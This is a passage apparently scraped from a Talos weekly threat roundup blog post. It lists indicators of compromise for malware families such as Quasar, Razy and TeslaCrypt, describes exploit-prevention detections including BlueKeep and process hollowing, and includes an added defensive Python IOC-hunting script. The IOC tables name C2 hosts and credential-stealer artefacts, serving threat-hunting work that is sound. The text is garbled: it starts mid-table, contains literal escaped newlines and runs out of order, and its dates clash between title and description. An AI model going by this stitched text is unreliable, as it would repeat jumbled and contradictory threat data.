Data\\HELP_FILE_430D48DC3.html` | 1 \n`%HOMEPATH%\\Local Settings\\Application Data\\HELP_FILE_430D48DC3.png` | 1 \n`%HOMEPATH%\\Local Settings\\Application Data\\HELP_FILE_530D48DC3.html` | 1 \n`%HOMEPATH%\\Local Settings\\Application Data\\HELP_FILE_530D48DC3.png` | 1 \n`%HOMEPATH%\\Local Settings\\Application Data\\HELP_FILE_630D48DC3.html` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 04e7c9d7cb59d57085636e06d1e30098ab81f85805bc9ac6c4c9270d697d6e96 434ff7bfd6a752f3c56c20d8a7e8853a94e99be9d112442eed257ee42800e957 49a97e5e68d188e423af3eebe2b3a62d2a285006d42c5dfd10cfdbe534534c91 61e76a0e801cb7a30221f4075ec8c5fc733cc7b3d5bda520551b8bd053f101d2 8f237cc28360ef130227b92323a986c3136242600fc2188b92c48fad5df2f7fe 98db4c353cc79a3b9bfae516ab56fab19166d2fed1f108cbff33447cc2feac33 a27d8ad3e0ef1d792cc6504a41d3eaecf11802d03fdbfb08c811217759f2d965 de940e24beca778c6d8afd8b625eeaff0549342ce061fd75ce817d2d5add612c e67b98c9041d13d17904f65f875e840c7f40cbf60fdc25c0767fefc5c57cb634 eccb6d79ce6669a5e4fb1f394f920224fe40d0dd782c8dd12cf4004c81c32765 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/--gH0fgsBuvg/XitP6mbuwEI/AAAAAAAADLo/x5bZ5eRZZLs3BOF3YTpnC6Uqj_Yx2cFrACLcBGAsYHQ/s1600/04e7c9d7cb59d57085636e06d1e30098ab81f85805bc9ac6c4c9270d697d6e96_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-DmERPFrZuX0/XitP-qGIHNI/AAAAAAAADLs/BII7BCDux3Mem3FsI6v9tUjcuy4XlYRLQCLcBGAsYHQ/s1600/04e7c9d7cb59d57085636e06d1e30098ab81f85805bc9ac6c4c9270d697d6e96_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-PxNRLnZXhds/XitQFKfOmWI/AAAAAAAADLw/PWWWGLn0Ec45CrbpBkDetWktWeu2fx2tQCLcBGAsYHQ/s1600/434ff7bfd6a752f3c56c20d8a7e8853a94e99be9d112442eed257ee42800e957_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### 
Win.Packed.Passwordstealera-7544289-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Quasar Client Startup ` | 12 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: java ` | 4 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Java ` | 4 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: error pending ` | 2 \n`<HKCR>\\LOCAL SETTINGS\\MUICACHE\\\\52C64B7E \nValue Name: LanguageList ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Windows startup ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: NET framework ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: steam ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\SCHEDULE\\TASKCACHE\\\\WINDOWS \nValue Name: Id ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\SCHEDULE\\TASKCACHE\\\\WINDOWS \nValue Name: Index ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: NvDisplay ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Windows Defender ` | 1 \nMutexes | Occurrences \n---|--- \n`SwHHcMzPFPnmaghyKW` | 2 \n`ymJAxrWzIz9Lmt1RL3` | 2 \n`UuCyPSySUiFSDdHPtO` | 2 \n`sFWQsTLv8c5vk4jyO0` | 1 \n`tsgtBnaQMyDFZrUQIp` | 1 \n`YsyBq3MBwCzQNk2qhM` | 1 \n`q624fQPLA3sreuCLzt` | 1 \n`N3og1f8lHLVNu6W30c` | 1 \n`KckvHhqL1uihc4dCLw` | 1 \n`RTzXcJcD26j9cGndLe` | 1 \n`9uxtMjacj46ojfxw8Z` | 1 \n`tmiYIVMkI1dD9zfRjT` | 1 \n`hI0uR11aF8XGlij0wp` | 1 \n`fJO2dbxEGn2ZNnVHEj` | 1 \n`zqUBYqdAinRE5xYguS` | 1 \n`RtX4BZD2nWkVu0prSe` | 1 \n`HjjzZQZESOkAInyZch` | 1 \n`cP20H0tkmTiytEkIEL` | 1 \n`ixlUgkBMIocn8A96xU` | 1 \n`yIKLaGMppBM6EDhhvU` | 1 \n`mLvIMV7J1hOyksFGvj` | 1 \n`hj0AV9bM5BIleznxOc` | 1 \n`UQjK2wv6weKFSvAPxM` | 1 \n`UrlxbiSJX7lUOpSRZs` | 1 \n`JsMa39ctmfwcdenPhN` | 1 \n \n*See JSON for more 
IOCs\n\nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`208[.]95[.]112[.]1` | 52 \n`37[.]8[.]73[.]90` | 2 \n`192[.]69[.]169[.]25` | 1 \n`103[.]43[.]75[.]105` | 1 \n`3[.]14[.]212[.]173` | 1 \n`3[.]19[.]114[.]185` | 1 \n`18[.]188[.]14[.]65` | 1 \n`103[.]136[.]43[.]131` | 1 \n`103[.]73[.]67[.]70` | 1 \n`74[.]118[.]139[.]67` | 1 \n`213[.]183[.]58[.]52` | 1 \n`141[.]255[.]158[.]23` | 1 \n`80[.]66[.]255[.]129` | 1 \n`95[.]59[.]113[.]113` | 1 \n`109[.]230[.]215[.]181` | 1 \n`185[.]248[.]100[.]84` | 1 \n`95[.]156[.]232[.]34` | 1 \n`88[.]150[.]227[.]112` | 1 \n`23[.]249[.]161[.]111` | 1 \n`36[.]84[.]57[.]230` | 1 \n`36[.]84[.]56[.]39` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`ip-api[.]com` | 52 \n`swez111[.]ddns[.]net` | 5 \n`scammer[.]chickenkiller[.]com` | 2 \n`holaholahola[.]hopto[.]org` | 2 \n`chrome[.]giize[.]com` | 2 \n`niroshimax[.]zapto[.]org` | 2 \n`0[.]tcp[.]ngrok[.]io` | 1 \n`gingles[.]ddns[.]net` | 1 \n`dhayan[.]ddns[.]net` | 1 \n`sanchosec[.]ddns[.]net` | 1 \n`apina123[.]duckdns[.]org` | 1 \n`mlks[.]ddns[.]net` | 1 \n`update1337[.]duckdns[.]org` | 1 \n`ord` | 1 \n`dike[.]duckdns[.]org` | 1 \n`nirovitch[.]zapto[.]org` | 1 \n`nume123[.]hopto[.]org` | 1 \n`pilnaspuodas[.]ddns[.]net` | 1 \n`danek56[.]ddns[.]net` | 1 \n`windows13467[.]ddns[.]net` | 1 \n`backtofuture[.]zapto[.]org` | 1 \n`nerdicon[.]ddns[.]net` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\Logs` | 35 \n`%APPDATA%\\Logs\\01-17-2020` | 35 \n`%APPDATA%\\SubDir` | 28 \n`%System32%\\Tasks\\WINDOWSSYSTEMHOST` | 22 \n`%APPDATA%\\SubDir\\Client.exe` | 18 \n`%System32%\\Tasks\\Quasar Client Startup` | 8 \n`%APPDATA%\\<random, matching '[A-Z][a-z]{3,5}\\[a-z]{4,6}'>.exe` | 8 \n`E:\\autorun.inf` | 7 \n`\\autorun.inf` | 7 \n`%System32%\\Tasks\\java` | 4 \n`%APPDATA%\\<random, matching '[a-z0-9]{3,7}'>` | 4 \n`%APPDATA%\\SubDir\\WinUpdate.exe` | 2 
\n`%SystemRoot%\\SysWOW64\\java64` | 2 \n`%SystemRoot%\\SysWOW64\\java64\\java.exe` | 2 \n`%System32%\\Tasks\\error pending ` | 2 \n`%APPDATA%\\SubDir\\fileintl.exe` | 2 \n`%System32%\\Tasks\\Windows Defender` | 1 \n`%System32%\\Tasks\\Windows` | 1 \n`%System32%\\Tasks\\Windows startup` | 1 \n`%System32%\\Tasks\\WinSql` | 1 \n`%APPDATA%\\SubDir\\WinSql1.exe` | 1 \n`%System32%\\Tasks\\NET framework` | 1 \n`%ProgramFiles(x86)%\\SubDir` | 1 \n`%ProgramFiles(x86)%\\SubDir\\Client.exe` | 1 \n`%System32%\\Tasks\\RDPBlox Agent` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 02c9df3dec221cacfa6c97e91bee174af3022dac4588e3f494108b0cc5c9fe1e 03fa8b9de359535afb3af2914e2bd91d630b85a0596604501968b12f9187b1da 0624f9670f56e83ab5bbdf903879ffd0facb5b27b4bc53d16f5d4a560033cdf8 0668b26c7ab4e7adbdf98d515b0a58ae06f5e89d67e5c9fa02a9ee7bea8a477a 09666ba370e36246342d7093b6c63b5a8ef10966fa78b79bcf570659a0dd2f77 0c598a620e83a6e0ee892aa5090e2dbbf36dde886620647be8c27bab0b94859e 0ed3feae6696b3986ae492d85fef56e2ec226d7b010154470b433bfc357f861b 189c7ebae4cdd338f844ba5adc3ecc322294a7be438a3a72eea69468ac068eb3 192a0440574068fd9297086e0cf05a57d8ae4af03045d6be4c0b4f21bd636a72 19b8ed7ab551d89467c665ee7f509fe3ece9101679b5302cdc70c6d3a8c12ee6 26f294e691ec271d761a167704d495ca8bdc4d66cb0cd332a0e49313164988b1 27473eaee1e66c3a9581d17b4ff94d481c31f23032b810493d99a23eebee6b22 29f55d706d0e7390d7e77aceae79909654b4868179ff6913f28d78df945a5a51 2b3eb6cf09691b169c603cbeba508c4056eb6c8d1f12abe11b3c11c77b130604 2d3cef89943a95c57418be1996431f9803c6df4a9307d1890a3885c8794986af 3068250bcb0e8ffcee254c2da91e2696703bf36cfb195415aa3b0c454601dad1 3204ad689f3939402dae9670970c55c684b559ce1a8ba5726eb3e143a0beea4a 3622a2b3adfc7cbc7727a7a13dc6c895290c6f6fc93c8e64e753e2041cafed16 362ec0bc0738f083dcdbf9472ebf4e6227b33d093c9dacf1093607fa3b53ea01 38c56bc6885e546caab8faa8f9b75a6b1d82a60f686038ccaf72f148187fb1ee 3baa2fb31a69683a134a24d5a5a05aa1619ce65ba9811e34d254a5efd708580c 
42ee0201d3a74bf465daef9178042cc7fb28bab5b932e6d7a865cbc11fce6c94 472736830d9114c83bad680bc95c138d3951213d1429e314749b18083ac5cdf2 4d583b00c74ef261c7c20e53563b521ddda7b85bf5b1ac98463af0c6488a55d0 54b3c135aa1fe9b870209d36e286df1d7dc4e6182b664285f3564c573dbbdc89 `

*See JSON for more IOCs

#### Coverage

Product | Protection
---|---
AMP |
Cloudlock | N/A
CWS |
Email Security |
Network Security |
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid |
Umbrella | N/A
WSA |

#### Screenshots of Detection

#### AMP

<https://1.bp.blogspot.com/--j10gGhbFIw/XitQhRzhu3I/AAAAAAAADMA/mfL71YT3qRUdze9uqgfY3fDPm550V_MRQCLcBGAsYHQ/s1600/26f294e691ec271d761a167704d495ca8bdc4d66cb0cd332a0e49313164988b1_amp.png>

#### ThreatGrid

<https://1.bp.blogspot.com/-i2qf-xTBN_I/XitQmZo7OUI/AAAAAAAADME/K8p_3SstFo8SODkhxhMLtTz-l9PZUA7ZACLcBGAsYHQ/s1600/3068250bcb0e8ffcee254c2da91e2696703bf36cfb195415aa3b0c454601dad1_tg.png>

* * *

## Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.

Detection | Count | Description
---|---|---
CVE-2019-0708 detected | 8483 | An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption in the Remote Desktop Protocol (RDP) service that can be triggered by sending a specially crafted RDP request. Because it is reachable before authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction.
Atom Bombing code injection technique detected | 795 | A process created a suspicious atom, which is indicative of the process injection technique known as Atom Bombing. Atoms are Windows identifiers that associate a string with a 16-bit integer; atoms placed in the global atom table are readable from every process. Malware abuses this by storing its shellcode as a global atom and queueing an Asynchronous Procedure Call (APC) to a thread in the target process. The APC routine (GlobalGetAtomName) copies the atom string, that is the shellcode, into the target's address space, and a further APC transfers execution to it. The Dridex banking trojan is known to use Atom Bombing, but other threats may leverage it as well.
Excessively long PowerShell command detected | 576 | A PowerShell command with a very long command-line argument, which may indicate an obfuscated script (for example, a script passed inline as an encoded or compressed string), has been detected. PowerShell is an extensible Windows scripting language present on all modern versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell-based threats.
Process hollowing detected | 288 | Process hollowing is an injection technique used to evade static analysis and any detection keyed on the launched image. A legitimate executable is started in a suspended state, its original image is unmapped from memory ("hollowed out") and replaced with the unpacked payload, whose contents were obfuscated or encrypted on disk, the thread's entry point is redirected to the payload and the thread is resumed. The malicious code then runs under the name, path and parent of a legitimate process.
Kovter injection detected | 264 | A process was injected into, most likely by an existing Kovter infection. Kovter is a click-fraud trojan that can also act as an information stealer. Kovter is also fileless malware: the malicious payload is stored inside the Windows registry and injected directly into memory using PowerShell. It can detect the usage of monitoring software such as Wireshark and sandboxes and report it to its C2. It spreads through malicious advertising and spam campaigns.
Gamarue malware detected | 193 | Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.
Installcore adware detected | 90 | InstallCore is an installer that bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that displays advertising in the form of pop-ups or by injecting into browsers and adding or altering advertisements on web pages. Adware is known to sometimes download and install malware.
Dealply adware detected | 61 | DealPly is adware that claims to improve the online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements into web pages. Adware has also been known to download and install malware.
Reverse tcp payload detected | 13 | An exploit payload intended to connect back to an attacker-controlled host over TCP has been detected.
WinExec payload detected | 13 | An exploit payload intended to run an attacker-supplied command on the compromised host through the WinExec API has been detected.
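The IOC tables above defang network indicators with `[.]`, describe dropped files with environment variables and `<random, matching '…'>` placeholders, and label every network column "Does not indicate maliciousness" for a reason: the same lists carry shared services (`ip-api[.]com`, `schema[.]org`, Google front ends in 172.217.0.0/16) next to RAT command-and-control hosts on dynamic-DNS providers. The script below is an added example, not Talos code. It parses a constructed subset of those rows, refangs them, matches them against constructed DNS, connection and file-creation events, drops hits on an analyst-maintained allowlist, and ranks hosts by how many independent indicator categories fired. The allowlist, the environment-variable expansions and the sample events are assumptions of this example.

```python
import ipaddress
import re

# Constructed subset of rows, copied defanged from the IOC tables above; the
# full list is in the roundup's JSON file.
IOC_ROWS = r"""
Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`ip-api[.]com` | 52
`swez111[.]ddns[.]net` | 5
`0[.]tcp[.]ngrok[.]io` | 1
`schema[.]org` | 8
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`172[.]217[.]11[.]46` | 2
`43[.]231[.]4[.]6/31` | 192
Files and or directories created | Occurrences
---|---
`%APPDATA%\SubDir\Client.exe` | 18
`%TEMP%\windefender.exe.jpg` | 6
`%APPDATA%\<random, matching '[a-z0-9]{3,7}'>` | 4
"""

# Analyst-maintained allowlist (an assumption of this example, not part of the
# roundup): shared services the samples contacted that would flood a hunt.
BENIGN_DOMAINS = {"ip-api.com", "schema.org", "api.w.org", "gmpg.org"}
BENIGN_NETS = [ipaddress.ip_network("172.217.0.0/16")]  # Google front ends
# Default Windows profile layout for the tables' environment variables (assumed).
ENV_PATTERNS = {
    "%APPDATA%": r"C:\\Users\\[^\\]+\\AppData\\Roaming",
    "%TEMP%": r"C:\\Users\\[^\\]+\\AppData\\Local\\Temp",
}

def refang(token):
    return token.replace("[.]", ".")  # undo the tables' `[.]` defanging

def path_to_regex(ioc_path):
    # `%APPDATA%\SubDir\Client.exe` -> regex over real paths for any user; the
    # tables' own `<random, matching '...'>` placeholders are spliced in as-is.
    parts, pos = [], 0
    for m in re.finditer(r"%[A-Za-z0-9()]+%|<random, matching '([^']+)'>", ioc_path):
        parts.append(re.escape(ioc_path[pos:m.start()]))
        parts.append(m.group(1) if m.group(1) is not None
                     else ENV_PATTERNS.get(m.group(0), re.escape(m.group(0))))
        pos = m.end()
    parts.append(re.escape(ioc_path[pos:]))
    return re.compile("^" + "".join(parts) + "$", re.IGNORECASE)

def parse_ioc_table(text):
    # The header row's first word ("Domain", "IP", "Files") selects the IOC type.
    iocs, section = {"domains": set(), "networks": [], "files": []}, None
    for line in text.splitlines():
        if "|" not in line or line.startswith("---"):
            continue
        value = line.rpartition("|")[0].strip()
        if not value.startswith("`"):
            section = value.split(" ")[0].lower()
            continue
        value = refang(value.strip("`"))
        if section == "domain":
            iocs["domains"].add(value.lower())
        elif section == "ip":  # single hosts and the /31, /30 blocks alike
            iocs["networks"].append(ipaddress.ip_network(value, strict=False))
        elif section == "files":
            iocs["files"].append(path_to_regex(value))
    return iocs

# Constructed sample telemetry: (source, host, value).
SAMPLE_EVENTS = [
    ("dns", "WS-041", "swez111.ddns.net"), ("dns", "WS-041", "ip-api.com"),
    ("dns", "WS-077", "0.TCP.NGROK.IO"), ("dns", "WS-090", "schema.org"),
    ("conn", "WS-041", "43.231.4.7"), ("conn", "WS-090", "172.217.11.46"),
    ("file", "WS-041", r"C:\Users\alice\AppData\Roaming\SubDir\Client.exe"),
    ("file", "WS-077", r"C:\Users\bob\AppData\Local\Temp\windefender.exe.jpg"),
    ("file", "WS-090", r"C:\Users\carol\AppData\Roaming\Microsoft\Teams\Teams.exe"),
]

def hunt(events, iocs):
    # One (host, kind, value) per event that matches an IOC and is not
    # allowlisted. A hit is a lead to triage, not a verdict.
    hits = []
    for kind, host, value in events:
        if kind == "dns":
            name = value.lower()
            matched = name in iocs["domains"] and name not in BENIGN_DOMAINS
        elif kind == "conn":
            addr = ipaddress.ip_address(value)
            matched = (any(addr in n for n in iocs["networks"])
                       and not any(addr in n for n in BENIGN_NETS))
        else:
            matched = any(p.match(value) for p in iocs["files"])
        if matched:
            hits.append((host, kind, value))
    return hits

def prioritise(hits):
    # Hosts ordered by how many independent IOC categories fired: a dropped
    # file plus a C2 lookup on one host is worth far more than either alone.
    by_host = {}
    for host, kind, _ in hits:
        by_host.setdefault(host, set()).add(kind)
    return sorted(by_host, key=lambda h: (-len(by_host[h]), h))
```

Run against the sample events, the two lookups of shared services and the Google connection are dropped, WS-041 surfaces first with DNS, connection and file hits that corroborate one another, and WS-077 follows with a C2 lookup and a dropped file. Swap `IOC_ROWS` for the roundup's JSON and the events for real Sysmon or DNS telemetry and the same logic applies; keep the allowlist under review, because a benign domain in one campaign can be the redirector in the next.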
* * *

ID TALOSBLOG:00DC30A0F4EFA56F4974DF2C3FB23FBB Type talosblog Title Threat Roundup for January 17 to January 24 Published 2020-01-24T12:58:50 Modified 2020-01-24T12:58:50 CVSS 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C) Href http://feedproxy.google.com/~r/feedburner/Talos/~3/1IoxheLePug/threat-roundup-0117-0124.html

Last seen 2020-01-10T23:26:13 Bulletin family blog CVE list CVE-2019-0708
Description
Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Jan. 3 and Jan. 10. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found [here](<https://alln-extcloud-storage.cisco.com/blogs/1/2020/01/tru.json_.txt>) that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicate maliciousness.

The most prevalent threats highlighted in this roundup are:

Threat Name | Type | Description
---|---|---
Win.Trojan.Razy-7505643-0 | Trojan | Razy is oftentimes a generic detection name for a Windows trojan. It collects sensitive information from the infected host, encrypts it and sends it to a command-and-control (C2) server. Information collected might include screenshots. The samples modify auto-execute functionality by setting and creating a value in the registry for persistence.
Win.Dropper.Tofsee-7492214-1 | Dropper | Tofsee is multi-purpose malware that features a number of modules used to carry out various activities such as sending spam messages, conducting click fraud, mining cryptocurrency, and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages to infect additional systems and increase the overall size of the botnet.
Win.Packed.Ursnif-7489213-0 | Packed | Ursnif is used to steal sensitive information from an infected host and can also act as a malware downloader. It is commonly spread through malicious emails or exploit kits.
Win.Packed.ZeroAccess-7489468-1 | Packed | ZeroAccess is a trojan that infects Windows systems, installing a rootkit to hide its presence on the affected machine and serving as a platform for conducting click-fraud campaigns.
Win.Ransomware.TeslaCrypt-7501245-1 | Ransomware | TeslaCrypt is a well-known ransomware family that encrypts a user's files with strong encryption and demands Bitcoin in exchange for a file decryption service. A flaw in the encryption algorithm was discovered that allowed files to be decrypted without paying the ransom, and eventually the malware developers released the master key, allowing all encrypted files to be recovered easily.
Win.Dropper.Upatre-7491797-0 | Dropper | Upatre is a malicious downloader often used by exploit kits and phishing campaigns. Upatre downloads and executes malicious executables, such as banking malware.
Win.Dropper.TrickBot-7490964-0 | Dropper | TrickBot is a banking trojan targeting sensitive information for certain financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB scripts.
Win.Packed.Formbook-7491272-1 | Packed | Formbook is an information stealer that attempts to collect sensitive information from an infected machine by logging keystrokes, stealing saved web browser credentials, and monitoring information copied to the clipboard.

* * *

## Threat Breakdown

### Win.Trojan.Razy-7505643-0

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\75E0ABB6138512271C04F85FDDDE38E4B7242EFE`, Value Name: `Blob` | 11
`<HKLM>\SOFTWARE\MICROSOFT\RADAR\HEAPLEAKDETECTION\SETTINGS\LEAKDIAGNOSISATTEMPTED` | 7
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED`, Value Name: `Hidden` | 3
`<HKLM>\SOFTWARE\MICROSOFT\RADAR\HEAPLEAKDETECTION\DIAGNOSEDAPPLICATIONS\0748AF3992DE6E3AA7B386B7F6C08EF2.EXE` | 1
`<HKLM>\SOFTWARE\MICROSOFT\RADAR\HEAPLEAKDETECTION\DIAGNOSEDAPPLICATIONS\1C3DDA8020173A5B45A7C80CFC8B0298.EXE` | 1
`<HKLM>\SOFTWARE\MICROSOFT\RADAR\HEAPLEAKDETECTION\DIAGNOSEDAPPLICATIONS\0748AF3992DE6E3AA7B386B7F6C08EF2.EXE`, Value Name: `LastDetectionTime` | 1
`<HKLM>\SOFTWARE\MICROSOFT\RADAR\HEAPLEAKDETECTION\DIAGNOSEDAPPLICATIONS\B4F3AEA9F95879ABBE9B311B5AB9FC30.EXE` | 1
`<HKLM>\SOFTWARE\MICROSOFT\RADAR\HEAPLEAKDETECTION\DIAGNOSEDAPPLICATIONS\2AA87EE2B7BAA7D413CC747537A867A2.EXE` | 1
\n`<HKLM>\\SOFTWARE\\MICROSOFT\\RADAR\\HEAPLEAKDETECTION\\DIAGNOSEDAPPLICATIONS\\1C3DDA8020173A5B45A7C80CFC8B0298.EXE \nValue Name: LastDetectionTime ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\RADAR\\HEAPLEAKDETECTION\\DIAGNOSEDAPPLICATIONS\\EB9064AF85850CF7B3485B2A911798D7.EXE ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\RADAR\\HEAPLEAKDETECTION\\DIAGNOSEDAPPLICATIONS\\B4F3AEA9F95879ABBE9B311B5AB9FC30.EXE \nValue Name: LastDetectionTime ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\RADAR\\HEAPLEAKDETECTION\\DIAGNOSEDAPPLICATIONS\\2AA87EE2B7BAA7D413CC747537A867A2.EXE \nValue Name: LastDetectionTime ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\RADAR\\HEAPLEAKDETECTION\\DIAGNOSEDAPPLICATIONS\\EB9064AF85850CF7B3485B2A911798D7.EXE \nValue Name: LastDetectionTime ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: goodsStartup key ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\RADAR\\HEAPLEAKDETECTION\\DIAGNOSEDAPPLICATIONS\\6035E0F59A5169E7C59129A3CDBD076E.EXE ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\RADAR\\HEAPLEAKDETECTION\\DIAGNOSEDAPPLICATIONS\\6035E0F59A5169E7C59129A3CDBD076E.EXE \nValue Name: LastDetectionTime ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: goods ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\RADAR\\HEAPLEAKDETECTION\\DIAGNOSEDAPPLICATIONS\\0786B90DA12B29B5CC97621DCC78FA3E.EXE ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\RADAR\\HEAPLEAKDETECTION\\DIAGNOSEDAPPLICATIONS\\0786B90DA12B29B5CC97621DCC78FA3E.EXE \nValue Name: LastDetectionTime ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: mrke ` | 1 \nMutexes | Occurrences \n---|--- \n`Global\\14c64321-2d62-11ea-a007-00501e3ae7b5` | 1 \nIP Addresses contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`172[.]217[.]12[.]206` | 10 \n`172[.]217[.]9[.]225` | 7 \n`172[.]217[.]5[.]238` | 6 \n`104[.]16[.]155[.]36` | 3 \n`77[.]88[.]21[.]158` | 3 \n`172[.]217[.]10[.]46` | 1 \n`172[.]217[.]10[.]33` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`smtp[.]yandex[.]com` | 3 \n`whatismyipaddress[.]com` | 3 \n`doc-00-6c-docs[.]googleusercontent[.]com` | 1 \n`doc-0s-9s-docs[.]googleusercontent[.]com` | 1 \n`doc-14-60-docs[.]googleusercontent[.]com` | 1 \n`doc-0k-c8-docs[.]googleusercontent[.]com` | 1 \n`doc-00-5o-docs[.]googleusercontent[.]com` | 1 \n`doc-10-6c-docs[.]googleusercontent[.]com` | 1 \n`doc-04-bg-docs[.]googleusercontent[.]com` | 1 \n`doc-04-6c-docs[.]googleusercontent[.]com` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\pid.txt` | 3 \n`%APPDATA%\\pidloc.txt` | 3 \n`%TEMP%\\holdermail.txt` | 3 \n`%TEMP%\\holderwb.txt` | 3 \n`%HOMEPATH%\\desktop\\product.pif` | 2 \n`%TEMP%\\bhv61AB.tmp` | 1 \n`%TEMP%\\bhv8DF6.tmp` | 1 \n`%HOMEPATH%\\Orkende` | 1 \n`%HOMEPATH%\\Orkende\\Recomm.pif` | 1 \n`%TEMP%\\bhv5953.tmp` | 1 \n \n#### File Hashes\n\n` 3031363a67eca33c68892ed7529803bbaa926a6f371204eeaa8ca205501d8cac 34b978969d994134de71dd45996dc5d10516e534e23a2abb8537a1c548ac1c93 51e97032af43de44947d564ee43a9b43278312873caaa4bbd7d3e4f7ec00eb89 58962a9133651591f2d4df22589d1cdd4f7cee175f70c7d47c5a854a5264ec98 5be87b343f2d3af80883ed4deb795c0ae8f7e0ae4ba08a6bbac5b3e4659d0341 6bd1baae5ba600ff4ece4523e53bf9818bcc381a56664e3104c1c317d6f5a3bc 6dfdb201ddd46c8f2ded273f3c8ed6c5beca63196b5428fe388f59faaac79597 731aa2659852eb9b98d573b3f59436b49c15492d8df94e18da5a8f4c41f48fbe 79acdd5ea559b2e7e29fa6b47ca1053e11dbaadf540fc2b140aca89d1539d17e 8fa302841d886e0198c96d76d93399f5905844f424b255e6707a74ea610c55ce cdaef1b003e82f8994dd616103781125fca98ec097ee79830c2262f41158237a `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  
